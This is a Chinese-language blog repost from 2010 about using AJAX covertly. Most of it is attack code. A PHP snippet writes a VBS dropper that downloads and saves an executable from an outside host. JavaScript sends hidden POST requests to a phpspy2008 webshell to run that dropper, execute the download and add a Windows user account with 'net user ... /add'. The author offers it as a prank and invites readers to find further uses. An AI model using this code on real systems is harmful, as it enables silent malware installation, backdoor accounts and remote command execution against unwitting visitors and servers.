AJAX在安全方面的应用
>首页 -> 社会专题 -> 硬件网络 2010-07-08 来源: 作者: 【】 浏览:614

本来想给小黑群里的人开个玩笑。谁知道经过小黑的csrf实例后,大家都先看代码了。这下我明白了。小黑用过的招数都不能再用了。再用就不灵了。因为小黑太黑,让人印象深刻。

还是记录一下吧,ajax真的是隐秘性很高。我是这样来利用的。比较彻底。

PHP代码:

elseif ($doing == 'writevbs') {    

$fp = @fopen('c:/angel.vbs','w');    

$vbs = "Set love = CreateObject(\"Microsoft.XMLHTTP\")\n".    

"love.Open \"GET\",\"http://www.4ngel.net/1.exe\",0\n".    

"love.Send()\n".    

"Set you = CreateObject(\"ADODB.Stream\")\n".    

"you.Mode = 3\n".    

"you.Type = 1\n".    

"you.Open()\n".    

"you.Write(love.responseBody)\n".    

"you.SaveToFile \"c:\\1.exe\",2";    

@fwrite($fp,$vbs);    

@fclose($fp);  

}

加了一段代码是生成一个VBS脚本。这段脚本的作用从4ngel.net上下载一个1.exe文件保存到他本地的1.exe,然后有一段是AJAX的功能代码。

JavaScript代码:

<script type="text/javascript">    

var http_request = false;    

function makeRequest(url, httpType, sendData) {    

http_request = false;    

if (!httpType) httpType = "GET";    

if (window.XMLHttpRequest) { // Non-IE...    

http_request = new XMLHttpRequest();    

if (http_request.overrideMimeType) {    

http_request.overrideMimeType('text/plain');    

}    

} else if (window.ActiveXObject) { // IE    

try {    

http_request = new ActiveXObject("Msxml2.XMLHTTP");    

} catch (e) {    

try {    

http_request = new ActiveXObject("Microsoft.XMLHTTP");    

} catch (e) {}    

}    

}    

if (!http_request) {    

alert('Cannot send an XMLHTTP request');    

return false;    

}    

http_request.open(httpType, url, true);    

http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');    

http_request.send(sendData);    

}    

//makeRequest('<?=$self?>', 'POST', 'action=file&doing=writevbs');    

//makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\angel.vbs');    

//makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=c:\1.exe');    

makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=net user angel angel /add');    

makeRequest('<?=$self?>', 'POST', 'action=shell&execfunc=system&command=echo my_name_is_angel > c:\\angel.txt');    

</script>

最后几句是以POST方式请求本地测试环境中的phpspy2008,调用命令执行功能,生成vbs,然后执行VBS。再执行下载的exe文件。不过我已经注释掉了。这样在本地测试是成功的。对待自己兄弟们不能这么心狠。所以就注释掉了。加了一个用户。

我只是想说。AJAX作为一个现在逐渐受到重视的技术,在强调增加用户体验的同时,带来的安全也是神不知鬼不觉的。因为他的请求。你根本察觉不到。更具体的应用还是要靠大家自己去领悟了

您看到此篇文章时的感受是:
Tags: 责任编辑:佚名
免责申明: 除原创及很少部分因网文图片遗失而补存外,本站不存储任何有版权的内容。你看到的文章和信息及网址索引均由机器采集自互联网,由于时间不同,内容可能完全不同,请勿拿本网内容及网址索引用于交易及作为事实依据,仅限参考,不会自行判断者请勿接受本站信息,本网转载,并不意味着赞同其观点或证实其内容的真实性.如涉及版权等问题,请立即联系管理员,我们会予以更改或删除,保证您的权利.对使用本网站信息和服务所引起的后果,本网站不作任何承诺.
】【打印繁体】【投稿】【收藏】 【推荐】【举报】【评论:0条】 【关闭】 【返回顶部
更多
上一篇批处理 U盘NTFS权限防毒设置 下一篇Windows XP下实现高效安全的vpn连..
密码: (新用户注册)

最新文章

图片主题

热门文章

推荐文章

相关文章

便民服务

手机扫描

空间赞助

快速互动

论坛互动
讨论留言

有事联系

有哪个那个什么的,赶紧点这里给DOVE发消息

统计联系

MAIL:gnlt@Dovechina.com
正在线上:

版权与建议

任何你想说的